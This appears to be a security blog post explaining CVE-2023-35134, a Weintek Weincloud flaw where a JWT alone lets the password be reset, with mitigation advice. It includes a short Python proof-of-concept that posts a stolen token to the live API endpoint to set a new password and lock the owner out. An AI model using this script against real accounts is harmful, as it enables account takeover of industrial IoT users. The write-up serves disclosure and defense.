CVE CyberSecurity Database News

CVE-2023-35134 - Password Reset in Weintek Weincloud v.13.6 with Only a JWT Token

Poster -

In this post, we’ll break down a real-world vulnerability: CVE-2023-35134. Found in Weintek Weincloud v.13.6, this flaw lets an attacker reset a user’s password if they have a valid JWT token, *and nothing else*. That means—if someone can get hold of your JWT, they can change your password without knowing your current one or needing any verification.

Let’s go step by step: what is Weintek Weincloud, what’s a JWT token, how does this vulnerability work, code sample of the exploit, and how to protect yourself.

What is Weintek Weincloud?

Weincloud by Weintek is a cloud management platform for Industrial IoT. It lets users connect, monitor, and control devices remotely—stuff like PLCs, HMIs, and other industrial controllers, often used in factories and utilities.

What’s a JWT Token?

JWT (JSON Web Token) is a way to safely pass information between parties as a JSON object. They’re often used for authentication and session management. If you log in to a service and get a JWT, you’re expected to carry it in your requests (like in an HTTP Authorization header) and the server verifies who you are.

Description

CVE-2023-35134 is a vulnerability in Weintek Weincloud v.13.6 that lets an attacker reset any account’s password using only the JWT token for that account. Usually, to reset a password, you need to prove you have access by knowing the old password or providing extra verification. In this case, if you have a JWT, you can just call the API and set a new password—no old password or multi-step verification required.

Why is this a Problem?

If an attacker gets your JWT—by any means, such as phishing, cross-site scripting (XSS), or sniffing insecure network traffic—they not only get access, but they can lock you out by changing your password!

References

- NVD Entry for CVE-2023-35134
- Weintek Official Website
- Exploit-DB Overview

Technical Details

The central flaw: The password reset endpoint on the Weincloud API did not require the current password or any out-of-band confirmation. It trusted the JWT token alone.

This means any POST request to the endpoint (e.g., /v1/api/user/password/update) with an Authorization header containing a valid JWT could change the password.

2. Use JWT to Change Password

Here’s a sample Python script showing how an attacker could use the JWT to reset the password to "newpassword123":

import requests

jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."  # stolen token
url = "https://weincloud.weintek.com/v1/api/user/password/update";

headers = {
    "Authorization": f"Bearer {jwt_token}",
    "Content-Type": "application/json"
}

data = {
    "password": "newpassword123"   # new password (no old password needed)
}

response = requests.post(url, json=data, headers=headers)
print(response.status_code)
print(response.text)

Expected result: 200 OK, and the account password is now reset!

3. Lock Out the Real User

Now, the attacker can log in with the new password. Since the user didn’t expect this, they're locked out of their own account.

How to Confirm If You Are Affected

1. Check your software version: if you are running Weincloud v.13.6 or earlier, you are likely affected.
2. Try to change the password while *not* providing the old password, using your own JWT in Postman or curl.

Mitigation & Fix

- Update Weincloud: Always keep to the latest version. Check for official patches or advisory here.

Invalidate JWTs on password change: Ensure JWTs are not long-lived.

- Require old password for changes: The API should demand proof that you know the current password, or use multi-factor authentication (MFA) for critical actions.

Final Notes

CVE-2023-35134 is a classic example: trust the token just a *bit* too much and you’re open to serious exploitation. Always treat password resets as high risk and demand as much confirmation as possible.

Stay Safe!

> Found this helpful? Read more about API security mistakes at OWASP.


*This post is an exclusive summary. For new discoveries and simple breakdowns, follow us for updates on industrial IoT security!*

Timeline

Published on: 07/19/2023 22:15:00 UTC
Last modified on: 07/26/2023 16:18:00 UTC